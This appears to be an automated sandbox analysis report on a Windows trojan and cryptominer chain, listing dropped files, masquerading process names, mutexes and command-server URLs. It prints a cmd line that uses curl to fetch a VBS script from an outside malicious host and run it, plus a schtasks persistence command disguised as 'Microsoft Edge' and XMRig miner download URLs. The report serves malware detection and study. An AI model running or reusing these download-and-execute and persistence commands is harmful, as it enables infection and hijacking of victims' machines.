                        Source: Microsoft-Edge.exe, 0000000E.00000003.2439702684.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2455135298.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2455135298.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2636667274.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2550111525.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2426774904.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2467067729.0000000000914000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2426774904.00000000008CF000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000002.3020533522.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2412607559.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2497419323.0000000000914000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2497419323.00000000008CF000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2619479146.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2690557192.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2467067729.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2605563246.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2669985845.0000000000914000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2564142044.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2523814240.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2426458006.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2577879379.0000000000914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnk
Source: loader_5879465914.exe, 00000007.00000003.2632263244.000000000377B000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2425064392.0000000000802000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2481189507.0000000003743000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2496432695.0000000003743000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2481058326.0000000003743000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://eijfrhegrtbrfcd.online:443/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1
Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003740000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003561000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com
Source: svchost64.exe, 00000095.00000002.2847173181.0000000003561000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resource
Source: svchost64.exe, 00000095.00000002.2847173181.0000000003561000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip
Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003780000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.000000000359F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/UnamSanctam/SilentXMRMiner/master/SilentXMRMiner/Resources/xmrig.z
Source: svchost64.exe, 0000008B.00000002.2788969573.00000000036ED000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 0000008B.00000002.2788969573.0000000003736000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003554000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://sanctam.net:58899
Source: svchost64.exe, 00000095.00000002.2847173181.0000000003510000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://sanctam.net:58899/assets/txt/resource_url.php?type=xmrig
Source: conhost.exe | Process created: 91
Source: cmd.exe | Process created: 156

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: axplong.exe.0.dr | Static PE information: section name:
Source: axplong.exe.0.dr | Static PE information: section name: .idata
Source: axplong.exe.0.dr | Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | File created: C:\Windows\system32\Microsoft\Libs\WR64.sys
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\Tasks\axplong.job
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | File created: C:\Windows\system32\services64.exe
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | File created: C:\Windows\system32\Microsoft\Libs
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | File created: C:\Windows\system32\Microsoft\Libs\sihost64.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00C2E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00C24CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00C63068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00C57D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00C24AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00C6765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00C62BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00C6777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00C66F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00C68720
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Code function: 107_2_00007FFD9BAC0ECD
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Code function: 139_2_00007FFD9BAA7642
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Code function: 139_2_00007FFD9BAA6896
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Code function: 139_2_00007FFD9BAA1141
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe | Code function: 144_2_00007FFD9BAC5772
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe | Code function: 144_2_00007FFD9BAC49C6
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Code function: 149_2_00007FFD9BA97642
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Code function: 149_2_00007FFD9BA96896
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Code function: 149_2_00007FFD9BA9108D
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe | Code function: 159_2_00007FFD9BAD5772
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe | Code function: 159_2_00007FFD9BAD49C6
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loader_5879465914[1].exe ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: String function: 00C37870 appears 33 times
Source: Microsoft-Edge.exe.7.dr | Static PE information: Number of sections : 18 > 10
Source: loader_5879465914.exe.6.dr | Static PE information: Number of sections : 18 > 10
Source: loader_5879465914[1].exe.6.dr | Static PE information: Number of sections : 18 > 10
Source: miner2.0.exe.82.dr | Static PE information: No import functions for PE file found
Source: svchost64.exe.85.dr | Static PE information: No import functions for PE file found
Source: services64.exe.107.dr | Static PE information: No import functions for PE file found
Source: sihost64.exe.139.dr | Static PE information: No import functions for PE file found
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: miner2.0.exe.82.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svchost64.exe.85.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: services64.exe.107.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe | Static PE information: Section: ZLIB complexity 0.9973763198228883
Source: file.exe | Static PE information: Section: nataabbx ZLIB complexity 0.9948613709117556
Source: axplong.exe.0.dr | Static PE information: Section: ZLIB complexity 0.9973763198228883
Source: axplong.exe.0.dr | Static PE information: Section: nataabbx ZLIB complexity 0.9948613709117556
Source: svchost64.exe.85.dr, yelshopxrkiqn.cs | Base64 encoded string: 'iWKBihCY/NR2u0VfXDnEMncwh0+pxXUtzTeI9OrvHieB1/U+tWGISXa2FTtyWV+O6+W+tAp9+fgFtq/qVxQlVw==', 'ieY8ZO9hFlLqpClco4yeBCyILf6h/s5ppeMlqk0FmZM7ROwjOVibc0UXkbJKHIkF', 'ieY8ZO9hFlLqpClco4yeBCyILf6h/s5ppeMlqk0FmZM7ROwjOVibc0UXkbJKHIkF', 'khR1b64TY8z9/BVRlRAkypYyYygZVgfzIVqfSrRVbtMA20lP9OIeb/63pXaoY2a900uUXc3nISGt4d+8ks0DQA==', 'Ki2fV6sqVt3eaBbMfXV41tgWCJ8rn7dUf0dsiy7tudXkvwzgD95p4EQYv9YXNvC3XrIW7u1JVNv0R7qyqCBtAYmqXCDXTakehAYnHB1XiN6BFmssQDRphFG109HSpPEX', 'khR1b64TY8z9/BVRlRAkypYyYygZVgfzIVqfSrRVbtMA20lP9OIeb/63pXaoY2a9wxBCW4jCfj3W0Gk/iTDqkUthU1U/7dUdCI9IQrSzF8I=', 'Ki2fV6sqVt3eaBbMfXV41tgWCJ8rn7dUf0dsiy7tudXkvwzgD95p4EQYv9YXNvC3XrIW7u1JVNv0R7qyqCBtAYmqXCDXTakehAYnHB1XiN5GEgIS4IV/6UqQrQnxXiEM'
Source: WR64.sys.139.dr | Binary string: \Device\WinRing0_1_2_0
Source: classification engine | Classification label: mal100.troj.spyw.evad.mine.winEXE@314/69@4/4
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Code function: 7_2_00401B3F GetCurrentProcessId,CreateToolhelp32Snapshot,fwrite,Process32First,_stricmp,Process32Next,CloseHandle,CloseHandle
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loader_5879465914[1].exeJump to behavior
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4296:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1988:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3732:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4088:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1004:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4588:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2124:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3396:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4544:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4928:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2568:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8180:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2784:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4444:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4048:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3248:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4496:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2944:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3672:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2208:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3960:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6032:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2448:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1820:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:888:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1992:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6188:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\44111dbc49
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\desktop.ini
                        Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: file.exe | ReversingLabs: Detection: 50%
                        Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: axplong.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: axplong.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: axplong.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
                        Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                        Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Process created: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cscript.exe cscript conf.vbs
                        Source: C:\Windows\System32\cscript.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f
                        Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
